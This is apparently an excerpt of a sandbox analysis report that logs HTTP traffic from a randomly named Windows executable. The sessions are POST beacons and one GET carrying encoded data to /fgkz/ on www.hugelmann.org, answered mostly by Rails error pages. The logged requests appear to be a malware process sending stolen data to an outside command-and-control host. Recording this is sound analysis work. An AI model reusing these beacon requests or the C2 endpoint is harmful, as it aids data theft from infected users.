                                Data Ascii: trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&
                                Aug 30, 2024 07:21:28.140171051 CEST1236INData Raw: 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34
                                Data Ascii: trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-f
                                Aug 30, 2024 07:21:28.145030022 CEST1236INData Raw: 3c 68 32 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 0a 20 20 20 20 3c 2f 68 32 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 20 6d 61 74 63 68 20 69 6e 20 70 72 69 6f 72 69 74 79 20 66 72 6f 6d 20 74 6f 70 20 74 6f 20 62 6f
                                Data Ascii: <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                34192.168.2.549752216.40.34.41805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:30.153744936 CEST641OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2b 70 47 67 46 75 53 56 2b 69 42 72 70 6a 4e 49 62 33 55 4d 4c 32 37 48 65 5a 78 48 42 73 51 45 62 6f 53 70 35 4e 39 32 59 31 67 4a 54 63 2f 32 79 49 76 4d 6b 79 44 71 49 58 2b 71 53 61 2f 32 52 57 76 53 46 50 6d 73 61 42 6c 75 57 30 55 70 35 31 46 43 4b 5a 4e 33 4f 70 77 6d 46 65 58 47 35 57 75 4f 57 53 7a 75 2b 45 68 46 67 76 50 32 41 45 71 49 79 43 2b 38 6f 71 6a 70 47 33 63 44 32 6b 6a 78 57 5a 66 48 30 53 44 44 61 63 54 6a 63 7a 49 47 54 35 64 53 4c 6d 6e 2b 42 30 34 70 41 70 6b 6b 63 56 76 41 37 5a 76 4b 58 45 66 55 54 51 49 55 5a 31 49 54 6a 4a 52 4e 37 54 2b 6b 33 64 66 68 61 7a 38 3d
                                Data Ascii: 4f2t8=+pGgFuSV+iBrpjNIb3UML27HeZxHBsQEboSp5N92Y1gJTc/2yIvMkyDqIX+qSa/2RWvSFPmsaBluW0Up51FCKZN3OpwmFeXG5WuOWSzu+EhFgvP2AEqIyC+8oqjpG3cD2kjxWZfH0SDDacTjczIGT5dSLmn+B04pApkkcVvA7ZvKXEfUTQIUZ1ITjJRN7T+k3dfhaz8=
                                Aug 30, 2024 07:21:30.667834997 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 6cc8d1b1-c997-4ad8-b0ba-aee70f1a65fa
                                x-runtime: 0.029674
                                content-length: 17007
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:30.667857885 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:30.667869091 CEST448INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:30.667881012 CEST1236INData Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                Aug 30, 2024 07:21:30.667891979 CEST1236INData Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                Aug 30, 2024 07:21:30.667901993 CEST1236INData Raw: 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 72 65 71 75 65 73 74 5f 73 74 6f 72 65 20 28 31 2e 35 2e 30 29 20 6c 69
                                Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                Aug 30, 2024 07:21:30.667915106 CEST612INData Raw: 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 35 22 20 68 72 65
                                Data Ascii: uration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
                                Aug 30, 2024 07:21:30.668118954 CEST1236INData Raw: 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 30 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f
                                Data Ascii: ><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middlew
                                Aug 30, 2024 07:21:30.668128967 CEST1236INData Raw: 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 63 61 63 68 65 2f 73 74 72 61 74 65 67 79 2f 6c 6f 63 61 6c 5f 63 61 63 68 65 5f 6d 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 32 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39
                                Data Ascii: 5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trac
                                Aug 30, 2024 07:21:30.668138981 CEST1236INData Raw: 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 72 61 63 65 46 72 61 6d 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 27 74 72 61 63 65 2d 66 72 61 6d
                                Data Ascii: ext/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i <
                                Aug 30, 2024 07:21:30.672981977 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 3c 74 68 3e 48 65 6c 70 65 72 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 48 54 54 50 20 56 65 72 62 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 50 61 74 68 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 43 6f 6e
                                Data Ascii: > <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>Controller#Action</th> </tr> <tr class='bottom'> <th> <a data-route-helper="_path" title="Returns a relative path (without the http or domain)


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                35192.168.2.549753216.40.34.41805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:32.691554070 CEST1654OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 2b 70 47 67 46 75 53 56 2b 69 42 72 70 6a 4e 49 62 33 55 4d 4c 32 37 48 65 5a 78 48 42 73 51 45 62 6f 53 70 35 4e 39 32 59 30 59 4a 54 75 48 32 7a 75 6e 4d 6c 79 44 71 41 33 2b 52 53 61 2b 71 52 58 4c 4f 46 50 37 5a 61 44 74 75 57 52 49 70 79 6b 46 43 5a 35 4e 33 57 70 77 64 4b 2b 57 43 35 57 2b 4b 57 53 6a 75 2b 45 68 46 67 73 58 32 55 46 71 49 30 43 2b 2f 2f 61 6a 66 56 6e 63 72 32 6b 36 4d 57 5a 4c 39 30 43 6a 44 61 38 44 6a 61 52 77 47 62 35 64 4d 49 6d 6e 6d 42 30 6b 32 41 70 4a 62 63 55 61 64 37 65 62 4b 55 68 71 4b 48 51 41 66 48 6d 6f 4a 77 72 38 65 70 32 65 42 74 50 7a 51 41 6d 53 56 66 34 73 53 71 4c 39 35 34 39 4c 62 38 42 63 6a 79 71 77 58 30 65 31 33 59 35 57 76 69 58 66 6b 46 66 67 78 46 38 37 30 69 2b 71 35 72 75 6b 74 62 57 79 6e 51 34 61 48 48 76 33 34 2f 6a 75 6e 72 6d 55 2b 78 54 63 2f 48 58 33 4e 77 73 2f 34 6d 6f 63 6f 6d 4a 31 30 4c 4e 33 79 5a 31 32 76 6c 6a 6e 57 45 71 46 77 56 64 6d 36 4f 6a 56 5a 71 44 48 44 67 36 46 55 4c 64 34 54 43 6e 78 6a 62 43 39 70 [TRUNCATED]
                                Data Ascii: 4f2t8=+pGgFuSV+iBrpjNIb3UML27HeZxHBsQEboSp5N92Y0YJTuH2zunMlyDqA3+RSa+qRXLOFP7ZaDtuWRIpykFCZ5N3WpwdK+WC5W+KWSju+EhFgsX2UFqI0C+//ajfVncr2k6MWZL90CjDa8DjaRwGb5dMImnmB0k2ApJbcUad7ebKUhqKHQAfHmoJwr8ep2eBtPzQAmSVf4sSqL9549Lb8BcjyqwX0e13Y5WviXfkFfgxF870i+q5ruktbWynQ4aHHv34/junrmU+xTc/HX3Nws/4mocomJ10LN3yZ12vljnWEqFwVdm6OjVZqDHDg6FULd4TCnxjbC9pQkBegylpY4jlnhoTDadwbREAwzm3oXHGb4fILT596G8lAlsT6TRvB30cGuA5OwOaFlk8enUm5r0Zh7M0ZaPTLQVKXFlUVPbkKQVZxw+HWMAZ2Q1EjXRjIpwKUtD6qWKEx530WYPGeYDQzJ+mdwD7+FvF8UBsSe5q6G8vFGoOX+GgROcWcm4TaHBbLEKmcWQ7xz0SN5TQkZKMfN3mxglsi7v5gq9fDg46gK1YSg1r9lGu9AHzBvTc/LY7UFzdqm7nA6ODrZUQ6eXvBoRRWzXRPgsw+bo2fYV0eOiOSppQLeoDtuUI6/iCAO/LR00sNwKJGdveFZNV7cq660m+5yMl878h8Ly2DP7dTnZ7B6O7dTZfNFRv1suiMmAPLpcCJt90UrKzgSEaR90DLGVs4+NXtZnVysY4nWFOqXIFWAy0kLWz2xq4F8nhd1A25DENwr8Q2a8wd2NET60U9RgmMdfBigBc0D2TcY/enoiaa8mMcI0yTx1bgRj3pBVEAYUXML9Yi7pgIZm0jUh533pLccitlVfIkiyPXnUqAGqG2fTwiJ/4V15X/5ENXLBQXxYhM5ZG9OVU3evymDU5dahvGeYvJqCZOuADSLOofXK+TfsHZNN33hsuRdLe/p1XYd2arokUFNH+Xbz4FjZBFT3HXJI589nM+nYptekNvi [TRUNCATED]
                                Aug 30, 2024 07:21:33.213637114 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 6423d2d3-1d81-406a-820f-58718bafdc34
                                x-runtime: 0.038536
                                content-length: 18019
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:33.213727951 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:33.213763952 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:33.213794947 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                Aug 30, 2024 07:21:33.213829041 CEST896INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                Aug 30, 2024 07:21:33.213861942 CEST1236INData Raw: 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72
                                Data Ascii: 2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-
                                Aug 30, 2024 07:21:33.213895082 CEST1236INData Raw: 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c
                                Data Ascii: (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/acti
                                Aug 30, 2024 07:21:33.213926077 CEST1236INData Raw: 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63
                                Data Ascii: trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&
                                Aug 30, 2024 07:21:33.213959932 CEST1236INData Raw: 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34
                                Data Ascii: trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-f
                                Aug 30, 2024 07:21:33.213993073 CEST1236INData Raw: 3c 68 32 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 0a 20 20 20 20 3c 2f 68 32 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 20 6d 61 74 63 68 20 69 6e 20 70 72 69 6f 72 69 74 79 20 66 72 6f 6d 20 74 6f 70 20 74 6f 20 62 6f
                                Data Ascii: <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>
                                Aug 30, 2024 07:21:33.218919992 CEST1012INData Raw: 20 20 20 20 2f 2a 70 61 74 68 28 2e 3a 66 6f 72 6d 61 74 29 0a 20 20 3c 2f 74 64 3e 0a 20 20 3c 74 64 3e 0a 20 20 20 20 3c 70 3e 6d 61 69 6e 23 69 6e 64 65 78 20 7b 3a 70 61 74 68 3d 26 67 74 3b 2f 2e 2a 2f 7d 3c 2f 70 3e 0a 20 20 3c 2f 74 64 3e
                                Data Ascii: /*path(.:format) </td> <td> <p>main#index {:path=&gt;/.*/}</p> </td></tr> </tbody></table><script type='text/javascript'> // support forEarch iterator on NodeList NodeList.prototype.forEach = Array.prototype.forEach;


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                36192.168.2.549754216.40.34.41805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:21:35.223557949 CEST347OUTGET /fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:35.711985111 CEST1236INHTTP/1.1 200 OK
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                x-content-type-options: nosniff
                                x-download-options: noopen
                                x-permitted-cross-domain-policies: none
                                referrer-policy: strict-origin-when-cross-origin
                                content-type: text/html; charset=utf-8
                                etag: W/"f45da7fb00592c85875ef8210fc161fb"
                                cache-control: max-age=0, private, must-revalidate
                                x-request-id: 1dcd2c0a-dd40-41f0-b936-8e692a9083c5
                                x-runtime: 0.006172
                                transfer-encoding: chunked
                                connection: close
                                Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
